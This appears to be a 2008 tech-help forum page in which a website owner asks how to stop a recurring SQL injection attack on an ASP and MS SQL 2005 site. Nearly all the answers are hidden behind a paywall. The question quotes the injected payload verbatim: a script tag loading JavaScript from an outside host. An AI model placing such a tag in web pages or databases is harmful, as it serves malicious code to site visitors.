Do not use on any
shared computer
August 30, 2008 06:39am pdt
 
[x]
Attachment Details

SQL Injection Attack - how to stop it once it's started??

Zones: Networking Security Vulnerabilities, MS SQL Server, SQL Server 2005
Tags: ASP, SQL, MS SQL 2005, www.bestaviation.net & aviationcareerguide.com
Hello,

I have fallen victim to an SQL injection attack (or what seems to be) and have had three Tables in a database corrupted with a script string reading <script src=http://www.banner82.com/b.js></script> and placing itself in every row and as many columns as it can.

I believe it may be caused by poor coding on my part (ie. not using parameterized coding in my SQL statements) but what I cannot figure out is how it manages to carry on. I have done the following preventive measures

1) Restored old Table in a new Table under a different name
2) Renamed every column in the new table

But before I have even managed to get around to changing the ASP code on my website to reflect these changes the data in the new table is getting corrupted!!

Only three Tables (out of many more) are affected but these are the three tables normally executed when a user is on my website - however the new table with the restored data has not been executed through my website yet at all! As far as any web user is concerned it doesn't even exist (I only just created the damn thing).

Can anyone give me a clue as to how it does it and how it manages to do it with such lightning speed???

No point restoring a DB if I can't stop it from corrupting itself the very next minute...

I use MS SQL 2005 on a Windows Server 2003 - my coding language is ASP
Start your free trial to view this solution
Related Solutions: Cleaning Up SQL Injection Attack - http://www.banner82.com/b.js script
[x]
The Solution Rating System

With so many solutions, how can you tell which solutions are most likely to help you and which ones are not? To provide you with a tool to use, we rate our solutions based on various elements that most accurately determine if a solution is a quality solution. To explain what factors affect the solution rating, here are the elements we take into consideration when formulating our solution rating.

  • The Grade of the Solution
  • The Zone Rank of the Expert Providing the Solution
  • The Number of Author and Expert Comments
  • The Number of Experts Contributing
  • The Feedback of the Community

Your Input Matters
Because of the way the system is set up, the most important variable in this equation is you. As a member of Experts Exchange, you are able to cast your vote on the quality of the solutions in regard to how complete, accurate, helpful and easy to understand each solution is. When you provide your feedback, each rating is adjusted accordingly. So, if you see a solution that has a poor rating that you think is a good solution, let us know by rating it. As you do, the rating will be adjusted and will become more accurate for other members of our site.

If you have any suggestions that you would like to make for our rating system, please ask a question in the Suggestions Zone of Community Support.

Thank you!
9.4
Question Stats
Zone: Security
Question Asked By: BestAviation
Solution Provided By: chapmandew
Participating Experts: 9
Solution Grade: B
Views: 244
Translate:
Loading Advertisement...
 
[+][-]Accepted Solution by chapmandew

Rank: Genius

Accepted Solution by chapmandew:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Author Comment by BestAviation
Author Comment by BestAviation:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Assisted Solution by chapmandew

Rank: Genius

Assisted Solution by chapmandew:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by cs97jjm3

Rank: Guru

Expert Comment by cs97jjm3:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Author Comment by BestAviation
Author Comment by BestAviation:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Assisted Solution by Tolomir
Assisted Solution by Tolomir:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Author Comment by BestAviation
Author Comment by BestAviation:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by ajhopen
Expert Comment by ajhopen:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by qdigital
Expert Comment by qdigital:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Author Comment by BestAviation
Author Comment by BestAviation:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by hibridassassin
Expert Comment by hibridassassin:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Author Comment by BestAviation
Author Comment by BestAviation:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by coloradodude
Expert Comment by coloradodude:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by hibridassassin
Expert Comment by hibridassassin:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by jurgenl
Expert Comment by jurgenl:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Author Comment by BestAviation
Author Comment by BestAviation:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by hibridassassin
Expert Comment by hibridassassin:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by Tolomir
Expert Comment by Tolomir:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by hibridassassin
Expert Comment by hibridassassin:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by jurgenl
Expert Comment by jurgenl:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by coloradodude
Expert Comment by coloradodude:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by pcardwell
Expert Comment by pcardwell:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Author Comment by BestAviation
Author Comment by BestAviation:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by pcardwell
Expert Comment by pcardwell:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by jurgenl
Expert Comment by jurgenl:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by jurgenl
Expert Comment by jurgenl:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by pcardwell
Expert Comment by pcardwell:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by qdigital
Expert Comment by qdigital:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
[+][-]Expert Comment by qdigital
Expert Comment by qdigital:

All comments and solutions are available to Premium Service Members only.

Start your 7-day free trial and see for yourself why Experts Exchange is the easiest and most proven technology resource in the world. Get Started

Already a member? Login to view this solution.

 
 
Loading Advertisement...
Open Discussion
Open Discussion
 
Comment by hibridassassin
gdigital,

I am getting tons of false positives so I agree with you...unfortunately, we are in the process of moving over to asp.net to prevent this sort of thing and until then, we just made it a policy that you can't use words with the contain the stuff on the blacklist.  It's a pain but we jsut decided to bite the bullet...I am interested to see what response you get to your question because applying some logic to see if more than one of the words in the blacklist are found sounds like a good idea.
 
 
20080723-EE-VQP-34 / EE_QW_2_20070628